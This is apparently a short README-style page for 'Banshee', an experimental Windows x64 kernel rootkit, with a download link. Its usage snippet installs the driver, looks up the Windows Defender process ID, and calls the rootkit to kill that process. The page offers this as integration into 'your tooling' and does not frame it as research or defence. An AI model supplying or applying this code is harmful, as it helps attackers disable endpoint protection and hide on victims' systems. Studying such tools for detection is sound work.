Banshee rootkit
Experimental Windows x64 Kernel Driver/Rootkit.
You can integrate Banshee into your tooling by including the Banshee.hpp file in your project, e.g.:
Banshee banshee = Banshee();
banshee.Install(driverPath);
banshee.Initialize();
int targetPid = GetDefenderPID(); // this would be your implementation
banshee.IoCtlKillProcess(targetPid); // instruct Banshee to kill the target process
download - https://github.com/eversinc33/Banshee